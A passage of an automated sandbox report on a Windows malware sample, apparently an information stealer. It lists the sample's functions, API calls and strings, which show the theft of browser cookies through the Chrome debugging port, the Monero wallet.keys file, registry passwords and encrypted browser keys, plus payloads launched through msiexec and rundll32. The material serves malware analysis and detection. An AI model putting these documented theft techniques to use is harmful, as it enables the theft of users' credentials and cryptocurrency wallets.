                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: b2f4b3606ed151d4c4538c5d1b50bd8f955cbb5f214dc6b5c8112be45d250f6c
                              • Instruction ID: 5e32c1b0ffb44260adf8f0142dc6ddd5776e453f0a3824b5f35ce0d79f9e7c31
                              • Opcode Fuzzy Hash: b2f4b3606ed151d4c4538c5d1b50bd8f955cbb5f214dc6b5c8112be45d250f6c
                              • Instruction Fuzzy Hash: 3871CA71910258ABDB14DBE8EC89FEEB779FF48700F108508F616EB290DB34A945CB61
                              Function 00823080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00823415
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008235AD
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0082373A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 0d8f286ed29af16048799fb5522fb99107ede6722bc26f897ff2f363d1685de1
                              • Instruction ID: 07438b001115408bb06890d976322197a7eb8c2cb8d2b0c45e11780a43a7017c
                              • Opcode Fuzzy Hash: 0d8f286ed29af16048799fb5522fb99107ede6722bc26f897ff2f363d1685de1
                              • Instruction Fuzzy Hash: 7A12F0B19101289BCB18EB94EDA2FEDB739FF14310F404599E506B6191EF346B89CF62
                              Function 00819BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00819A50: InternetOpenA.WININET(00830AF6,00000001,00000000,00000000,00000000), ref: 00819A6A
                              • lstrcat.KERNEL32(?,cookies), ref: 00819CAF
                              • lstrcat.KERNEL32(?,008312C4), ref: 00819CC1
                              • lstrcat.KERNEL32(?,?), ref: 00819CD5
                              • lstrcat.KERNEL32(?,008312C8), ref: 00819CE7
                              • lstrcat.KERNEL32(?,?), ref: 00819CFB
                              • lstrcat.KERNEL32(?,.txt), ref: 00819D0D
                              • lstrlen.KERNEL32(00000000), ref: 00819D17
                              • lstrlen.KERNEL32(00000000), ref: 00819D26
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 3174675846-3542011879
                              • Opcode ID: edfbae18a3ce30ce07d68f427c617d14bf0dd84defe00608991f72c53fa987e3
                              • Instruction ID: 349dd7899174d77ddd792d6eaf892cb484932f498daa5674e0f5c3687daf4d0d
                              • Opcode Fuzzy Hash: edfbae18a3ce30ce07d68f427c617d14bf0dd84defe00608991f72c53fa987e3
                              • Instruction Fuzzy Hash: 70512DB1900518ABCB14EBE4DC9AFEE7338FF44701F404558E216E7191EB755A89CF62
                              Function 00825510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 008162D0: InternetOpenA.WININET(00830DFF,00000001,00000000,00000000,00000000), ref: 00816331
                                • Part of subcall function 008162D0: StrCmpCA.SHLWAPI(?,015FE430), ref: 00816353
                                • Part of subcall function 008162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816385
                                • Part of subcall function 008162D0: HttpOpenRequestA.WININET(00000000,GET,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 008163D5
                                • Part of subcall function 008162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0081640F
                                • Part of subcall function 008162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816421
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825568
                              • lstrlen.KERNEL32(00000000), ref: 0082557F
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 008255B4
                              • lstrlen.KERNEL32(00000000), ref: 008255D3
                              • lstrlen.KERNEL32(00000000), ref: 008255FE
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 12458d98b96d70f46138b7f3c8a5f032c5fdeb05b979a31381b6175dea7cd6fa
                              • Instruction ID: 830b047f9c5875c8f4caaa797492912e528774f86c5ab4c54fd73144ac9fff04
                              • Opcode Fuzzy Hash: 12458d98b96d70f46138b7f3c8a5f032c5fdeb05b979a31381b6175dea7cd6fa
                              • Instruction Fuzzy Hash: 39511B309101189BCB18EF68EDA6AED7779FF10340F504458E906EB591EF306B85CB63
                              Function 00821520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: dd3708d8bb6db78dffb2d0751ddea64f2f96c175f7f50501896415187a55c019
                              • Instruction ID: fd913ca3aeed34b79b4741a033098214010b931004fb49f8d7fd38750e0f7253
                              • Opcode Fuzzy Hash: dd3708d8bb6db78dffb2d0751ddea64f2f96c175f7f50501896415187a55c019
                              • Instruction Fuzzy Hash: C6C181B59001299BCF18EF64EC99FEE7779FF64304F004598E409AB281DA70AAC5CF91
                              Function 008244D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 0082453C
                              • lstrcat.KERNEL32(?,015FDE30), ref: 0082455B
                              • lstrcat.KERNEL32(?,?), ref: 0082456F
                              • lstrcat.KERNEL32(?,015FCF40), ref: 00824583
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00828F20: GetFileAttributesA.KERNEL32(00000000,?,00811B94,?,?,0083577C,?,?,00830E22), ref: 00828F2F
                                • Part of subcall function 0081A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0081A489
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                                • Part of subcall function 00829550: GlobalAlloc.KERNEL32(00000000,0082462D,0082462D), ref: 00829563
                              • StrStrA.SHLWAPI(?,015FDE90), ref: 00824643
                              • GlobalFree.KERNEL32(?), ref: 00824762
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A23F
                                • Part of subcall function 0081A210: LocalAlloc.KERNEL32(00000040,?,?,?,00814F3E,00000000,?), ref: 0081A251
                                • Part of subcall function 0081A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A27A
                                • Part of subcall function 0081A210: LocalFree.KERNEL32(?,?,?,?,00814F3E,00000000,?), ref: 0081A28F
                              • lstrcat.KERNEL32(?,00000000), ref: 008246F3
                              • StrCmpCA.SHLWAPI(?,008308D2), ref: 00824710
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00824722
                              • lstrcat.KERNEL32(00000000,?), ref: 00824735
                              • lstrcat.KERNEL32(00000000,00830FA0), ref: 00824744
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 1607c17120862fc961c392870c1a4e682899831f4c4b61f062e00630050a3bcb
                              • Instruction ID: f6ebaf770458baf4ebf3e8af52263b1e4f84b0a7bd0205d07e113c7ab38629d9
                              • Opcode Fuzzy Hash: 1607c17120862fc961c392870c1a4e682899831f4c4b61f062e00630050a3bcb
                              • Instruction Fuzzy Hash: EA7152B6900218ABDB14EBA4ED96FDE737DFF88300F004598F615D6181EA359B85CF62
                              Function 00811310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008112B4
                                • Part of subcall function 008112A0: RtlAllocateHeap.NTDLL(00000000), ref: 008112BB
                                • Part of subcall function 008112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008112D7
                                • Part of subcall function 008112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008112F5
                                • Part of subcall function 008112A0: RegCloseKey.ADVAPI32(?), ref: 008112FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0081134F
                              • lstrlen.KERNEL32(?), ref: 0081135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00811377
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00811465
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 0081A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                                • Part of subcall function 0081A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                                • Part of subcall function 0081A110: LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                                • Part of subcall function 0081A110: ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                                • Part of subcall function 0081A110: LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                                • Part of subcall function 0081A110: CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                              • DeleteFileA.KERNEL32(00000000), ref: 008114EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: e82407ba80eef13f17ee2b50f4c42942e8750f1c3ba8601fdf14d65d49cac0d1
                              • Instruction ID: 94172fb672d053bc0b3dbdde9e8cf58e824d4a2c5f140cda3eccdf8478614fe3
                              • Opcode Fuzzy Hash: e82407ba80eef13f17ee2b50f4c42942e8750f1c3ba8601fdf14d65d49cac0d1
                              • Instruction Fuzzy Hash: 5D5121B1D501285BCB19EB64EDA6AED733DFF54300F4045D8B60AA2091EE305BC9CBA6
                              Function 00819A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(00830AF6,00000001,00000000,00000000,00000000), ref: 00819A6A
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00819AAB
                              • InternetCloseHandle.WININET(00000000), ref: 00819AC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$Open$CloseHandle
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 3289985339-2144369209
                              • Opcode ID: 39776422977606c79a809fcb6573faf0bae20e6483fafd3a78cf422dbcd054f0
                              • Instruction ID: e06c6578720bbe86d4c566317cf09024412851eb328afbefe723bb5848312f7b
                              • Opcode Fuzzy Hash: 39776422977606c79a809fcb6573faf0bae20e6483fafd3a78cf422dbcd054f0
                              • Instruction Fuzzy Hash: 43410675A10268ABCB14EB94DCA5FDD7778FF48750F104198F549EA290CBB4AAC0CF60
                              Function 00817630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00817330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0081739A
                                • Part of subcall function 00817330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817411
                                • Part of subcall function 00817330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0081746D
                                • Part of subcall function 00817330: GetProcessHeap.KERNEL32(00000000,?), ref: 008174B2
                                • Part of subcall function 00817330: HeapFree.KERNEL32(00000000), ref: 008174B9
                              • lstrcat.KERNEL32(00000000,0083192C), ref: 00817666
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008176A8
                              • lstrcat.KERNEL32(00000000, : ), ref: 008176BA
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008176EF
                              • lstrcat.KERNEL32(00000000,00831934), ref: 00817700
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00817733
                              • lstrcat.KERNEL32(00000000,00831938), ref: 0081774D
                              • task.LIBCPMTD ref: 0081775B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
